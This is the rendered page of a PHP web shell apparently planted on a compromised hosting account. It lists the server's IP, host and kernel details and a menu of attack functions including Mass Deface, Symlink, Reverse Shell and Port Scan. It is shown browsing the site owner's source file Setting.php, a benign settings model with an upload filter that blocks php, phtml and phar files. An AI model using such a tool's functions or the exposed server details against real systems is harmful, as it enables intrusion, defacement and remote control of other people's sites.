Tul xxx Tul
User / IP
:
216.73.216.159
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
construcciones
/
admin
/
app
/
Models
/
Viewing: Setting.php
<?php class Setting extends BaseModel { protected string $table = 'settings'; protected array $fillable = [ 'system_name', 'site_name', 'logo', 'favicon', 'email', 'phone', 'whatsapp', 'address', 'instagram', 'facebook', 'tiktok', 'youtube', 'linkedin', 'seo_title', 'seo_description', 'seo_keywords', 'site_status', 'updated_at', ]; public function getSettings(): array { $statement = $this->db->query('SELECT * FROM settings WHERE id = 1 LIMIT 1'); $settings = $statement->fetch(); if ($settings) { return $settings; } $this->create([ 'id' => 1, 'system_name' => 'Panel Administrativo', 'site_name' => 'Constructora F Bonill@', 'site_status' => 'activo', ]); return $this->getSettings(); } public function updateSettings(array $data): bool { $data['updated_at'] = date('Y-m-d H:i:s'); return $this->update(1, $data); } public function uploadLogo(array $file, ?string $oldFile = null): ?string { return $this->uploadFile($file, ['jpg', 'jpeg', 'png', 'webp'], 'logo', $oldFile); } public function uploadFavicon(array $file, ?string $oldFile = null): ?string { return $this->uploadFile($file, ['png', 'ico', 'webp'], 'favicon', $oldFile); } public function isValidUpload(array $file, string $type): bool { if (empty($file['name'])) { return true; } if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || ($file['size'] ?? 0) > 2 * 1024 * 1024) { return false; } $allowedExts = $type === 'logo' ? ['jpg', 'jpeg', 'png', 'webp'] : ['png', 'ico', 'webp']; $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION)); if (in_array($extension, ['php', 'js', 'html', 'svg', 'phtml', 'phar'], true)) { return false; } return in_array($extension, $allowedExts, true); } private function uploadFile(array $file, array $allowedExts, string $prefix, ?string $oldFile): ?string { if (empty($file['name']) || ($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) { return null; } $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION)); if ($extension === 'jpeg') { $extension = 'jpg'; } if (!in_array($extension, $allowedExts, true)) { return null; } $filename = $prefix . '_' . date('YmdHis') . '_' . bin2hex(random_bytes(6)) . '.' . $extension; $directory = ROOT_PATH . '/storage/uploads/settings'; $destination = $directory . '/' . $filename; if (!is_dir($directory)) { mkdir($directory, 0775, true); } if (!move_uploaded_file($file['tmp_name'], $destination)) { return null; } $this->deleteOldFile($oldFile); return 'storage/uploads/settings/' . $filename; } private function deleteOldFile(?string $oldFile): void { if (!$oldFile) { return; } $path = ROOT_PATH . '/' . ltrim($oldFile, '/'); $base = realpath(ROOT_PATH . '/storage/uploads/settings'); $target = realpath($path); if ($base && $target && str_starts_with($target, $base) && is_file($target)) { unlink($target); } } }
Coded With 💗 by
0x6ick